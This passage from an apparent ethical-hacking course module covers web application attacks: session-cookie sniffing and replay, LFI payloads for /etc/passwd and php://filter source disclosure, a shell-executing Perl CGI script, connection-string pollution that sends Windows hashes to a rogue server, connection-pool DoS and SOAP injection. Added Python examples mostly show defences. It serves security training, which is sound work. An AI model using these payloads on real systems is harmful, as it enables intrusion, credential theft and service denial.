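    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def set_cookie_attributes(raw_response: str) -> Dict[str, Dict[str, bool]]:
    """Map each cookie the server set to its Secure/HttpOnly attributes."""
    result = {}
    _, headers = parse_headers(raw_response)
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        attrs = {p.lower() for p in parts[1:]}
        result[cookie_name] = {"secure": "secure" in attrs,
                               "httponly": "httponly" in attrs}
    return result


def request_cookies(raw_request: str) -> Dict[str, str]:
    """Extract the Cookie header of a request as a name -> value map."""
    cookies = {}
    _, headers = parse_headers(raw_request)
    for name, value in headers:
        if name == "cookie":
            for pair in value.split(";"):
                if "=" in pair:
                    k, v = pair.strip().split("=", 1)
                    cookies[k] = v
    return cookies


def exposed_session_cookies(raw_response: str, raw_request: str) -> List[str]:
    """Session cookies the server issued without the Secure flag and that the
    client then sent over plaintext HTTP: these are the replayable ones."""
    attrs = set_cookie_attributes(raw_response)
    sent = request_cookies(raw_request)
    return sorted(
        name for name in sent
        if name.lower() in SESSION_COOKIE_NAMES
        and not attrs.get(name, {}).get("secure", False)
    )


def build_replay(raw_request: str, path: str) -> str:
    """Construct a request to another path reusing the sniffed cookies."""
    _, headers = parse_headers(raw_request)
    host = dict(headers)["host"]
    cookie = "; ".join(f"{k}={v}" for k, v in request_cookies(raw_request).items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n"
```

On a real capture the same functions are applied to the reassembled TCP payloads (Wireshark's
"Follow TCP Stream" gives exactly this text); the interesting finding is a session cookie that
lacks Secure, because the browser will keep sending it over port 80 even if the site also
offers HTTPS.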
■ Wireshark
Source: https://www.wireshark.org
Wireshark is a network protocol analyzer that allows attackers to capture and
interactively browse network traffic. Wireshark captures live network traffic from
Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and
FDDI networks, thus helping attackers sniff session IDs in transit to and from a target
web application.

[Figure: Wireshark capture with the display filter "http.cookie" applied, listing HTTP GET and
POST requests, with one "GET / HTTP/1.1" request expanded to show its Host, User-Agent, Accept,
Accept-Language, Accept-Encoding, DNT, Connection and Cookie headers]

Figure 14.77: Screenshot of Wireshark


Perform Injection/Input Validation Attacks

Supply crafted malicious input that is syntactically correct according to the interpreted
language being used to break the application's normal intended use

■ Web Scripts Injection: If the user input is used in dynamically executed code, enter crafted
input that breaks the intended data context and executes commands on the server
■ LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass
LDAP filters to the directory service and obtain direct access to its data
■ OS Commands Injection: Exploit operating systems by entering malicious code in input fields if
applications utilize user input in a system-level command
■ XPath Injection: Enter malicious strings in input fields to manipulate the XPath query so that
it interferes with the application's logic
■ SMTP Injection: Inject arbitrary SMTP commands into an application and SMTP server
conversation to generate large volumes of spam email
■ Buffer Overflow: Inject a large amount of bogus data beyond the capacity of the input field
■ SQL Injection: Enter a series of malicious SQL queries into input fields to directly
manipulate the database
■ File Injection: Inject malicious files by exploiting "dynamic file include" mechanisms in web
applications

Note: For complete coverage of SQL injection concepts and techniques, refer to Module 15: SQL
Injection

Perform Local File Inclusion (LFI)

Local File Inclusion (LFI) vulnerabilities enable attackers to make the server include, and so
disclose or execute, files already present on it, by changing a request parameter in a web
browser

An LFI vulnerability occurs when an application includes files named by user input without
proper validation, thereby enabling the attacker to modify the input and embed path traversal
characters

Evade added .php and other extensions of the file
■ File extensions are added using PHP code:
$file = $_GET['page'];
require($file . ".php");
■ If an attacker inserts a null byte (%00) at the end of the attack string, the .php can be
evaded (PHP versions before 5.3.4 only):
http://xyz.com/index.php?page=../../../../../../etc/passwd%00
■ Another method to evade the added .php is to add a question mark (?) to the attack string
(only effective when the include resolves a URL wrapper rather than a local path):
http://xyz.com/index.php?page=../../../../../../etc/passwd?

Bypassing .php execution
■ An LFI vulnerability can read .txt files, but not .php files, because .php files get executed
by the server and only their output is returned
■ Evade .php execution by using a built-in PHP filter as shown below:
http://xyz.com/index.php?page=php://filter/convert.base64-encode/resource=index

Perform Injection/Input Validation Attacks


Injection attacks are very common in web applications. They exploit the vulnerable input
validation mechanism implemented by the web application. There are many types of injection
attacks, such as web script injection, OS command injection, SMTP injection, LDAP injection,
and XPath injection. Another frequently occurring attack is an SQL injection attack.


Injection takes place when an application passes user-supplied data to an interpreter as part
of a command or query. To launch an injection attack, attackers supply crafted data that tricks
the interpreter into executing unintended commands or queries. Because of these injection flaws,
attackers can read, create, update, and delete any data available to the application. In some
cases, attackers can even use the application to reach systems behind several layers of
firewalls and take complete control of the application and its underlying system.
Injection Attacks/Input Validation Attacks

To perform injection attacks, supply crafted malicious input that is syntactically correct
according to the interpreted language being used, so that it changes the application's normal
intended operation.
Some ways to perform injection attacks are described below:
■ Web Scripts Injection: If user input is used in dynamically executed code, enter crafted
input that breaks the intended data context and executes commands on the server.
■ OS Commands Injection: Exploit the operating system by entering malicious code in input
fields if the application passes user input to a system-level command.
■ SMTP Injection: Inject arbitrary SMTP commands into the application's conversation with the
SMTP server, for example to generate large volumes of spam email.
■ SQL Injection: Enter a series of malicious SQL queries into input fields to directly
manipulate the database.
■ LDAP Injection: Take advantage of non-validated web application input to alter the LDAP
filter sent to the directory service and obtain direct access to directory data.
■ XPath Injection: Enter malicious strings in input fields to manipulate the XPath query so
that it interferes with the application's logic.
■ Buffer Overflow: Inject more data than the receiving buffer can hold, so that adjacent memory
is overwritten.
■ File Injection: Inject malicious files by exploiting "dynamic file include" mechanisms in web
applications.
■ Canonicalization: Manipulate variables that reference files with "dot-dot-slash (../)"
sequences to access restricted directories in the application.
Note: For complete coverage of SQL injection concepts and techniques, refer to Module 15:
SQL Injection.
Perform Local File Inclusion (LFI)

A local file inclusion (LFI) vulnerability enables attackers to make the server include, and
thereby disclose or execute, files that already exist on it, simply by changing a request
parameter in the web browser. Such a vulnerability arises when an application includes files
named by user input without proper validation, thereby enabling the attacker to modify the
input and embed path traversal characters.


LFI vulnerabilities are most often found in PHP-based websites. Simple PHP code susceptible to
LFI is given below: the value of the URL parameter is passed to require() without any
validation.
$file = $_GET['page'];
require($file);
In this case, an attacker can supply a path traversal string and fetch the /etc/passwd file
using the following URL:
http://xyz.com/index.php?page=../../../../../../etc/passwd
■ Evade added .php and other extensions of the file
In many applications, the file extension is appended in the PHP code as follows:
$file = $_GET['page'];
require($file . ".php");
Now, .php is appended to the supplied name, so the traversal above fails because the file
/etc/passwd.php does not exist. On PHP versions before 5.3.4, inserting a null byte (%00) at
the end of the attack string truncates the path at the C string level, so the appended .php is
ignored:
http://xyz.com/index.php?page=../../../../../../etc/passwd%00
Another method to evade the appended .php is to add a question mark (?) to the attack string,
which turns the appended text into a query string. This only works when the include resolves a
URL wrapper (allow_url_include enabled), not a local filesystem path:
http://xyz.com/index.php?page=../../../../../../etc/passwd?
■ Bypassing .php execution
An LFI vulnerability can read .txt files but not .php files, because the server executes .php
files and returns only their output instead of the source. This can be evaded using the
built-in php://filter wrapper, which applies a conversion filter before the include:
http://xyz.com/index.php?page=php://filter/convert.base64-encode/resource=index
Here, the filter Base64-encodes the file, so the server returns the encoded source of index.php
rather than executing it. The attacker saves the response and decodes it to recover the
original code:
base64 -d saved.txt > index.php
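As an added example, not from the original module, the following Python reproduces what the
require() lines above end up opening for each payload (including the pre-5.3.4 null-byte
truncation), tags the LFI tricks present in a raw page parameter for log review or a WAF rule,
and shows a hardened resolver that allowlists the page name and verifies the resolved path is
still under the pages directory. The directory and page names are assumptions.

```python
import os
import re
from typing import List
from urllib.parse import unquote

# Assumed layout for the example: page templates live here and the request
# parameter names a page without extension, as in require($file . ".php").
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"index", "about", "contact"}


def vulnerable_resolve(page: str, legacy_null_truncation: bool = False) -> str:
    """What require($file . '.php') ends up opening. With legacy_null_truncation
    (PHP < 5.3.4 behaviour) the path is cut at the first NUL byte, which is
    why %00 discards the appended extension."""
    path = os.path.join(PAGES_DIR, page) + ".php"
    if legacy_null_truncation:
        path = path.split("\x00", 1)[0]
    return os.path.normpath(path)


def classify_payload(value: str) -> List[str]:
    """Tag the LFI tricks present in a raw 'page' parameter; an empty list
    means nothing suspicious was found."""
    v = unquote(value)
    tags = []
    if re.match(r"^[a-z][a-z0-9+.-]*:", v, re.I):      # php://, http://, data: ...
        tags.append("wrapper")
    if "\x00" in v:
        tags.append("null-byte")
    if v.endswith("?"):
        tags.append("trailing-query")
    if ".." in v.replace("\\", "/").split("/"):
        tags.append("traversal")
    return tags


def safe_resolve(page: str) -> str:
    """Hardened lookup: allowlist the name, build the path from it, then
    verify the resolved path is still under PAGES_DIR. Raises ValueError."""
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,32}", page):
        raise ValueError("page name outside allowed character set")
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    base = os.path.realpath(PAGES_DIR)
    candidate = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, candidate]) != base:   # defence in depth
        raise ValueError("resolved path escapes the pages directory")
    return candidate


def is_accepted(page: str) -> bool:
    """True if safe_resolve would serve the page, False if it rejects it."""
    try:
        safe_resolve(page)
        return True
    except ValueError:
        return False
```

The allowlist alone is sufficient; the realpath containment check is kept because it also
catches a symlink planted inside the pages directory, which a name check cannot see.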


Attack Application Logic Flaws

Most application flaws occur due to the negligence and false assumptions of web developers

Completely examine the web applications to identify logic flaws for exploitation

Use tools like Burp Suite to manipulate the requests to the web applications

Retail Web Application Logic Flaw Exploitation Scenario

[Slide figure: two flows through a retail website. Normal user: Select Product, Finalize
Order, Proceed to pay, Delivery Details. Attacker: Select Product, Finalize Order, Delivery
Details, skipping the "Proceed to pay" stage by manipulating the requests to the application]

Attack Application Logic Flaws


In all web applications, a vast amount of logic is applied at every level, and the
implementation of some of it can be vulnerable in ways that are not immediately noticeable.
Most attackers focus on attacks such as SQL injection and XSS, since these have easily
recognizable signatures. By contrast, application logic flaws are not associated with any
common signature, which makes them more difficult to identify. Automated vulnerability scanners
cannot find this type of flaw; it has to be found by manually reasoning about the application's
intended workflow, and attackers who do so can cause severe damage to the web application.
Most application logic flaws arise from the negligence and false assumptions of developers. They
vary among different types of web applications and are not restricted to a particular class of
bug. Studying previously exploited applications with common logic flaws gives a good idea of
how to approach exploiting flaws in application logic.
A common scenario illustrating the exploitation of application logic flaws by attackers is
described below:
■ Scenario: Identify and exploit logic flaws in retail web applications

In most retail web applications, the process of placing an order includes selecting the
product, finalizing the order, providing payment details, and providing delivery details. The
developer assumes that every customer will pass through these stages in the designed sequence.
Identify such applications and, using a proxy tool such as Burp Suite, take control of the
requests sent to the web application. Then attempt to bypass the third stage, i.e., jump from
the second stage (finalize order) directly to the fourth stage (delivery details) by submitting
the request for the later stage without having completed payment. This type of attack is also
called forced browsing. This flaw enables the attacker to


avoid paying the product price and still receive the product at the delivery address. It can
result in severe financial losses if an attacker exploits it on a large scale.

[Figure: two flows through the retail website. Normal user: Select Product, Finalize Order,
Proceed to pay, Delivery Details. Attacker: Select Product, Finalize Order, Delivery Details,
skipping the "Proceed to pay" stage by manipulating the requests to the application]

Figure 14.78: Screenshot displaying web application logic flaw exploitation
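An added Python example, not code from the original module, of the flaw in the figure: a
checkout whose stage handlers trust whichever stage the client names, beside one that keeps the
order's position in the workflow server-side and accepts only the next stage. The stage names
and the two request sequences are constructed for the example.

```python
from enum import Enum
from typing import Dict, List, Optional


class Stage(Enum):
    SELECT = "select"
    FINALIZE = "finalize"
    PAY = "pay"
    DELIVERY = "delivery"


# The only transitions the business process allows (None = fresh order).
NEXT_STAGE: Dict[Optional[Stage], Stage] = {
    None: Stage.SELECT,
    Stage.SELECT: Stage.FINALIZE,
    Stage.FINALIZE: Stage.PAY,
    Stage.PAY: Stage.DELIVERY,
}


class VulnerableCheckout:
    """Each stage is a separate handler and none of them checks what came
    before: whichever request the client sends is processed."""

    def __init__(self) -> None:
        self.paid = False
        self.shipped = False

    def handle(self, request: Dict[str, str]) -> str:
        stage = request.get("stage")
        if stage == "pay":
            self.paid = True
        elif stage == "delivery":
            self.shipped = True            # never verifies self.paid
            return "order shipped"
        return "ok"


class HardenedCheckout:
    """The order's position in the workflow lives server-side; a request is
    accepted only if it names exactly the next stage, and shipping also
    re-checks that payment actually happened."""

    def __init__(self) -> None:
        self.current: Optional[Stage] = None
        self.paid = False
        self.shipped = False
        self.rejected: List[str] = []

    def handle(self, request: Dict[str, str]) -> str:
        try:
            requested = Stage(request.get("stage"))
        except ValueError:
            self.rejected.append(f"unknown stage {request.get('stage')!r}")
            return "rejected"
        expected = NEXT_STAGE.get(self.current)
        if requested is not expected:
            where = self.current.value if self.current else "start"
            self.rejected.append(f"{requested.value} requested while at {where}")
            return "rejected"
        if requested is Stage.PAY:
            self.paid = True
        if requested is Stage.DELIVERY and not self.paid:
            self.rejected.append("delivery without payment")
            return "rejected"
        self.current = requested
        if requested is Stage.DELIVERY:
            self.shipped = True
            return "order shipped"
        return "ok"


def replay(app, stages: List[str]) -> Dict[str, bool]:
    """Send a sequence of stage requests, as an intercepting proxy lets an
    attacker do, and report the resulting order state."""
    for stage in stages:
        app.handle({"stage": stage})
    return {"paid": app.paid, "shipped": app.shipped}


NORMAL_FLOW = ["select", "finalize", "pay", "delivery"]
ATTACK_FLOW = ["select", "finalize", "delivery"]   # skips "Proceed to pay"
```

The rejected list is what a detection engineer wants logged: an out-of-sequence stage request
from an authenticated session is a strong signal of someone probing the workflow with a proxy.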


Attack Shared Environments

Organizations leverage third-party service providers for hosting and maintaining their web
applications and relevant web infrastructure
For example, a malicious client of the service provider may try to compromise the security of
another organization's web application, or a client may deploy a vulnerable web application that
exposes and compromises the web applications of other organizations

Attacks on the access mechanism
■ Organizations use an administrative web interface for configuring and managing web
applications from a remote location
■ Check whether the remote access mechanism has any unpatched vulnerabilities or configuration
errors that can be exploited
■ Check whether the access privileges are properly separated between clients

Attacks between applications
■ Vulnerabilities existing in one web application may allow attackers to execute malicious
script and compromise the security of other hosted web applications
■ For example, an SQL injection vulnerability in one application may allow attackers to run
arbitrary SQL commands and queries to retrieve data in the shared environment

Attack Shared Environments


Nowadays, organizations leverage third-party service providers for hosting and maintaining their
web applications and relevant web infrastructure. These service providers serve multiple clients
and host their web applications side by side on the same infrastructure. This approach exposes
the hosted applications to threats from one another. For example, a malicious client of the
service provider may try to compromise the security of another organization's web application,
or a client may deploy a vulnerable web application that gives an attacker a foothold from which
to compromise other organizations' web applications.
The following attacks can be performed on shared environments:
■ Attacks on the access mechanism
The application service provider provides an administrative web interface through which the
organizations configure and manage their web application and its database from a remote
location. This remote access mechanism is vulnerable to various attacks.
o Check whether the remote access mechanism has any unpatched vulnerabilities or
configuration errors that can be exploited. Attackers exploit such vulnerabilities to capture
credentials and gain access to the web application and its database.
o Check whether access privileges are properly separated between clients. For example, a poor
configuration may give customers shell access instead of file access within their own
directory. This may allow attackers to access sensitive files and data belonging to other
customers stored on the same web servers.


■ Attacks between applications

Vulnerabilities in one web application may allow attackers to execute malicious scripts and
compromise the security of the other applications hosted on the same infrastructure. For
example, the following CGI script passes the value of the "command" form field straight to a
shell through Perl backticks, which lets anyone who can reach it execute commands remotely:
#!/usr/bin/perl
use strict;
use CGI qw(:standard escapeHTML);

print header, start_html('');
if (param()) {
    my $command = param("command");   # user-supplied, never validated
    $command = `$command`;            # backticks run it through the shell
    print "$command\n";
} else {
    print start_form(), textfield("command"), submit(), end_form();
}
print end_html;
By requesting this script over the Internet, attackers can execute OS commands such as whoami
with the privileges of the web server process, which on shared hosting commonly also serves
the other customers' applications.
Furthermore, a vulnerable web application can be exploited to compromise the security of other
web applications. For example, an SQL injection vulnerability in one application may allow
attackers to run arbitrary SQL commands and queries to retrieve data in the shared environment
and manipulate the data of other applications.


Attack Database Connectivity

Database connection strings are used to connect applications to database engines

Example of a common connection string used to connect to a Microsoft SQL Server database:
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

Database connectivity attacks exploit the way applications connect to the database instead of
abusing database queries

Types of Data Connectivity Attacks
■ Connection String Injection
■ Connection String Parameter Pollution (CSPP) Attacks
■ Connection Pool DoS

Connection String Injection

In a delegated authentication environment, inject parameters in a connection string by
appending them with the semicolon (;) character

A connection string injection attack can occur when dynamic string concatenation is used to
build connection strings based on user input

Before Injection
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

After Injection
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off"

When the connection string is populated, the Encryption value will be added to the previously
configured set of parameters


Connection String Parameter Pollution (CSPP) Attacks

Try to overwrite parameter values in the connection string to steal user IDs and to hijack web
credentials

■ Hash Stealing: Replace the value of the Data Source parameter with that of a rogue Microsoft
SQL Server connected to the Internet and running a sniffer
Data source=myServer; initial catalog=db1; integrated security=no; user id=; Data Source=Rogue_Server; Password=; Integrated Security=true;
Sniff Windows credentials (password hashes) when the application uses its Windows credentials
to attempt a connection to Rogue_Server
■ Port Scanning: Try to connect to different ports by changing the value and observing the
error messages obtained
Data source=myServer; initial catalog=db1; integrated security=no; user id=; Data Source=Target_Server,Target_Port (e.g., 443); Password=; Integrated Security=true;
■ Hijacking Web Credentials: Try to connect to the database by using the web application's
system account instead of the credentials that would be provided to a user
Data source=myServer; initial catalog=db1; integrated security=no; user id=; Data Source=Target_Server; Password=; Integrated Security=true;

Connection Pool DoS

Examine the connection pooling settings of the application, construct a large malicious SQL
query, and run multiple queries simultaneously to consume all connections in the connection
pool, causing database queries to fail for legitimate users

Example:
■ In ASP.NET, the default maximum number of allowed connections in the pool is 100 and the
timeout is 30 seconds
■ Thus, run 100 queries, each with an execution time of 30+ seconds, within 30 seconds to cause
a connection pool DoS that prevents others from using the database-related parts of the
application

Attack Database Connectivity


Database connection strings are used to connect applications to database engines. In these
attacks, attackers target a database connection that forms a link between a database server
and its client software. A web application establishes a connection with the database by
providing a driver with a connection string that holds the address of a specific database or
server and offers instance and user authentication credentials.


For example:
Server=sql_box; Database=Common; User ID=uid; Pwd=password;
Attacking data connectivity can give attackers unauthorized control over the database and access
to the sensitive information it holds. Database connectivity attacks exploit the way in which
applications connect to the database instead of abusing database queries.
For this purpose, use methods such as connection string injection, hash stealing, port
scanning, and hijacking web credentials.
The following is an example of a common connection string used to connect to a Microsoft SQL
Server database:
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"
Data connectivity attacks are of the following types:
■ Connection String Injection: In a delegated authentication environment, attackers inject
parameters into a connection string by appending them after a semicolon. This is possible when
dynamic string concatenation is used to build connection strings from user input.
■ Connection String Parameter Pollution (CSPP) Attacks: Attackers overwrite parameter values in
the connection string by repeating a keyword the application already set.
■ Connection Pool DoS: Attackers examine the connection pooling settings of the target
application, construct a large malicious SQL query, and run multiple queries simultaneously to
consume all the connections in the connection pool, causing database queries to fail for
legitimate users.
Connection String Injection

A connection string injection attack occurs when the server uses dynamic string concatenation
to build connection strings from user input. If the server does not validate the input and lets
delimiter characters through unescaped, an attacker can potentially access sensitive data or
other resources on the server. For example, an attacker can supply a semicolon followed by an
additional key/value pair. Because the data provider parses the connection string with a "last
one wins" rule, the injected value replaces the legitimate one for that keyword.
The connection string builder classes eliminate this guesswork and protect the server from
syntax errors and injection. They provide methods and properties corresponding to the known
key/value pairs permitted by each data provider, and each class maintains a fixed collection of
synonyms that it translates into the corresponding well-known key name. The builder checks for
valid key/value pairs, throws an exception on an invalid pair, and quotes delimiters inside a
value so that injected text stays part of the value instead of becoming a new keyword.
Attackers can easily inject parameters by simply adding a semicolon (";") using connection
string injection techniques in a delegated authentication environment, i.e., where the
application builds the connection string from the credentials the user types in.


In the following example, the application asks the user for a username and password and builds
the connection string from them. The attacker enters the password as "pwd; Encryption=off",
which switches off encryption for the connection: when the connection string is populated, the
injected Encryption value is appended to the previously configured set of parameters and takes
effect.

Before Injection
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

After Injection
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off"

Figure 14.79: Screenshot displaying connection string injection - before and after

Connection String Parameter Pollution (CSPP) Attacks


Applications use connection strings to connect to database engines. Connection string parameter
pollution (CSPP) techniques exploit semicolon-delimited database connection strings that are
built dynamically from user input supplied to the web application.
In CSPP attacks, attackers overwrite parameter values in the connection string to steal
credential hashes, scan ports, and hijack the web application's own database credentials.
■ Hash Stealing
Replace the value of the Data Source parameter with that of a rogue Microsoft SQL Server by
injecting into the username and password fields as follows:
User_Value: ; Data Source=Rogue_Server
Password_Value: ; Integrated Security=true

Thus, the resulting connection string would be:

Data source=myServer; initial catalog=db1; integrated security=no; user id=; Data Source=Rogue_Server; Password=; Integrated Security=true;

Here, the parameters "Data Source" and "Integrated Security" appear twice, and the data provider
uses the last value of each. The web application therefore attempts a Windows (integrated)
authentication to the rogue server, and a sniffer running on the rogue server captures the
Windows credentials (password hashes) of the account the application runs as.
■ Port Scanning
Try to connect to different ports by changing the value and observing the error messages
obtained.
User_Value: ; Data Source=Target_Server,Target_Port
Password_Value: ; Integrated Security=true

The resulting connection string would be:

Data source=myServer; initial catalog=db1; integrated security=no; user id=; Data Source=Target_Server,Target_Port; Password=; Integrated Security=true;

Here, the data provider takes the last "Data Source" value, so the web application tries to
connect to port Target_Port on Target_Server. Because the error returned for a closed port
differs from that for an open port or a non-SQL service, you can scan ports by noting the
different error messages.
■ Hijacking Web Credentials

Try to connect to the database using the web application's system account instead of a
user-provided set of credentials.
User_Value: ; Data Source=Target_Server
Password_Value: ; Integrated Security=true

The resulting connection string is:

Data source=myServer; initial catalog=db1; integrated security=no; user id=; Data Source=Target_Server; Password=; Integrated Security=true;

Here, the "Integrated Security" parameter is overwritten with the value "true", so the
connection is authenticated with the Windows account under which the web application runs
rather than with the credentials the user supplied. This lets you reach the database with the
application's own privileges.
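The connection string injection and CSPP mechanics above (last-one-wins parsing, keyword
synonyms, and why builder-style quoting of values stops the injection), as an added Python
example that is not from the original module. The parser is a simplified model of the .NET
provider grammar, the synonym table is a subset of the documented keywords, and the server and
database names are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Keyword synonyms the SQL Server client treats as the same setting (a subset
# of the documented list; enough for the example).
SYNONYMS = {
    "server": "data source", "address": "data source", "addr": "data source",
    "network address": "data source",
    "database": "initial catalog",
    "uid": "user id", "user": "user id",
    "pwd": "password",
    "trusted_connection": "integrated security",
}


def split_pairs(cs: str) -> List[Tuple[str, str]]:
    """Split a connection string on ';' outside quoted values. A value may be
    wrapped in "..." or '...' (doubling the quote embeds it), which is how the
    provider grammar protects values that contain ';' or '='."""
    pairs, i, n = [], 0, len(cs)
    while i < n:
        eq, semi = cs.find("=", i), cs.find(";", i)
        if eq == -1 or (semi != -1 and semi < eq):     # segment with no '='
            i = n if semi == -1 else semi + 1
            continue
        key = cs[i:eq].strip()
        j = eq + 1
        while j < n and cs[j] == " ":
            j += 1
        if j < n and cs[j] in "\"'":                   # quoted value
            quote, j, chars = cs[j], j + 1, []
            while j < n:
                if cs[j] == quote:
                    if j + 1 < n and cs[j + 1] == quote:   # doubled quote
                        chars.append(quote)
                        j += 2
                        continue
                    j += 1
                    break
                chars.append(cs[j])
                j += 1
            value = "".join(chars)
        else:                                          # bare value up to ';'
            end = cs.find(";", j)
            end = n if end == -1 else end
            value, j = cs[j:end].strip(), end
        pairs.append((key, value))
        semi = cs.find(";", j)
        i = n if semi == -1 else semi + 1
    return pairs


def parse_connection_string(cs: str) -> Dict[str, str]:
    """Normalise keys through SYNONYMS and apply last-one-wins, which is what
    lets a later 'Data Source=' override the legitimate one."""
    params: Dict[str, str] = {}
    for key, value in split_pairs(cs):
        k = key.lower()
        params[SYNONYMS.get(k, k)] = value
    return params


def build_unsafe(user: str, password: str) -> str:
    """Vulnerable: user-supplied values concatenated straight into the string."""
    return ("Data Source=myServer; Initial Catalog=db1; Integrated Security=no; "
            f"User ID={user}; Password={password};")


def quote_value(value: str) -> str:
    """Builder-style escaping: wrap a value in double quotes if it contains a
    delimiter, a quote or surrounding whitespace, doubling embedded quotes."""
    if re.search(r'[;="\']', value) or value != value.strip():
        return '"' + value.replace('"', '""') + '"'
    return value


def build_safe(user: str, password: str) -> str:
    """Hardened: every user-controlled value goes through quote_value, so the
    parser sees it as one value and no keyword can be smuggled in."""
    return ("Data Source=myServer;Initial Catalog=db1;Integrated Security=no;"
            f"User ID={quote_value(user)};Password={quote_value(password)};")


def overridden_keys(user: str, password: str) -> List[str]:
    """Keys of the legitimate string whose value an injection changed."""
    clean = parse_connection_string(build_unsafe("Username", "pwd"))
    dirty = parse_connection_string(build_unsafe(user, password))
    return sorted(k for k in clean if dirty.get(k) != clean[k])
```

Feeding the three CSPP payloads from the text through build_unsafe shows "data source" and
"integrated security" being replaced; the same payloads through build_safe end up as the literal
user ID and password, which is the behaviour a real connection string builder gives you for
free.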
Connection Pool DoS

Examine the connection pooling settings of the application, construct a large malicious SQL
query, and run multiple queries simultaneously to consume all the connections in the connection
pool, causing database queries to fail for legitimate users.
For example, by default in ASP.NET the maximum number of connections allowed in the pool is 100
and the timeout is 30 seconds. Thus, run 100 queries, each taking more than 30 seconds to
execute, within a 30-second window to cause a connection pool DoS such that no one else can use
the database-related parts of the application until the queries complete or time out.


Attack Web Application Client

Interact with server-side applications in unexpected ways to perform malicious actions against the end
users and access unauthorized data

■ Cross-Site Scripting
■ Redirection Attacks
■ HTTP Header Injection
■ Frame Injection
■ Request Forgery Attack
■ Session Fixation
■ Privacy Attacks
■ ActiveX Attacks

Attack Web Application Client


Attacks performed on a server-side application infect the client-side application when the latter
interacts with malicious servers or processes malicious data. Attacks on the client side occur
when the client establishes a connection with the server. If there is no connection between the
client and the server, then there is no risk, because the server cannot pass malicious data to the
client.
Consider a client-side attack in which an infected web page targets a specific browser weakness
and exploits it successfully. Consequently, the malicious server gains unauthorized control of
the client system. Attackers interact with the server-side applications in unexpected ways to
perform malicious actions against the end users and access unauthorized data.
Some of the methods that attackers use to perform malicious attacks are discussed below.
■ Cross-Site Scripting: An attacker bypasses the client's ID security mechanism, obtains
access privileges, and then injects malicious scripts into the web pages of a website.
These malicious scripts can even rewrite the HTML content of the website.
■ HTTP Header Injection: Attackers split an HTTP response into multiple responses by
injecting a malicious response in an HTTP header. Thus, they can deface websites,
poison the cache, and trigger cross-site scripting.
■ Request Forgery Attack: In a request forgery attack, attackers exploit the trust that a
website or web application places in a user's browser. The attack works by including a link
on a page that takes the user to an authenticated website.
■ Privacy Attacks: A privacy attack involves tracking performed with the help of a remote
site by employing a leaked persistent browser state.


■ Redirection Attacks: Attackers develop code and links that resemble a legitimate site
that a user wants to visit; however, the URL redirects the user to a malicious website on
which attackers could potentially obtain the user's credentials and other sensitive
information.
■ Frame Injection: When scripts do not validate their input, attackers inject code through
frames. This affects all the browsers and scripts that do not validate untrusted input.
These vulnerabilities occur in HTML pages with frames. Another reason for this
vulnerability is that web browsers support frame editing.
■ Session Fixation: Session fixation helps attackers hijack valid user sessions. They
authenticate themselves using a known session ID and then use that known session ID to
hijack a user-validated session. Thus, attackers trick users and access a genuine web
server using an existing session ID value.
■ ActiveX Attacks: Attackers lure victims via email or via a link that is constructed so
that remote code execution loopholes become accessible, allowing the attackers to obtain
access privileges equal to those of authorized users.


Attack Web Services

Web services work atop legacy web applications, and any attack on a web service will immediately expose an underlying
application's business and logic vulnerabilities for various attacks

[Figure: the attacker reaches the web service client and, through it, the package application, custom application, database system, database, and identity and application management servers; attack classes shown are web services attacks (SOAP injection, XML injection), WSDL probing, information leakage, application logic attacks, database attacks, and DoS attacks]

Web Services Probing Attacks

■ In the first step, trap the WSDL document from web service traffic and analyze it to determine the purpose of the
application and identify its functions, entry points, and message types
■ Create a set of valid requests by selecting a set of operations and formulating request messages according to the rules
of the XML Schema that can be submitted to the web service
■ Use these requests to include malicious contents in SOAP requests and analyze errors to gain a deeper understanding
of potential security weaknesses

[Figure: the attacker injects an arbitrary character (') into the name field of a GetProductInformationByName SOAP request; the server throws an error, returning a SOAP fault with faultcode soap:Server and a faultstring beginning System.Web.Services.Protocols.SoapException]


Web Service Attacks: SOAP Injection

Inject malicious query strings in the user input field to bypass web services authentication mechanisms and
access backend databases

This attack works similarly to SQL Injection attacks

[Figure: an Account Login form submitted with Username "%" and Password "' or 1=1 or blah='"; the Server Response is a GetProductInformationByNameResponse SOAP message returning productid 25, productName Painting101, productQuantity 3, and productPrice 1500]

Web Service Attacks: SOAPAction Spoofing

■ Every SOAP request contains an operation that is executed by the application and is included as the first child element in the SOAP Body
■ SOAPAction is an additional HTTP header used when SOAP messages are transmitted using HTTP
■ This header informs the receiving web service about the operation present in the SOAP body without the need to perform XML parsing
■ Attackers use tools such as WS-Attacker to manipulate the operations included in the SOAPAction headers

WS-Attacker: https://github.com


Web Service Attacks: WS-Address Spoofing

WS-Address provides additional routing information in the SOAP header to support asynchronous communication

In a WS-Address spoofing attack, an attacker sends a SOAP message containing fake WS-Address information to the
server. The <ReplyTo> header consists of the address of the endpoint selected by the attacker rather than the address
of the web service client

[Figure: on the left, regular SOAP traffic between the WS client and server, where the SOAP Header carries <ReplyTo><Address>http://client</Address></ReplyTo>; on the right, un-requested SOAP traffic received by the WS client after the attacker sends the server a message whose ReplyTo address names the client]

Web Service Attacks: XML Injection

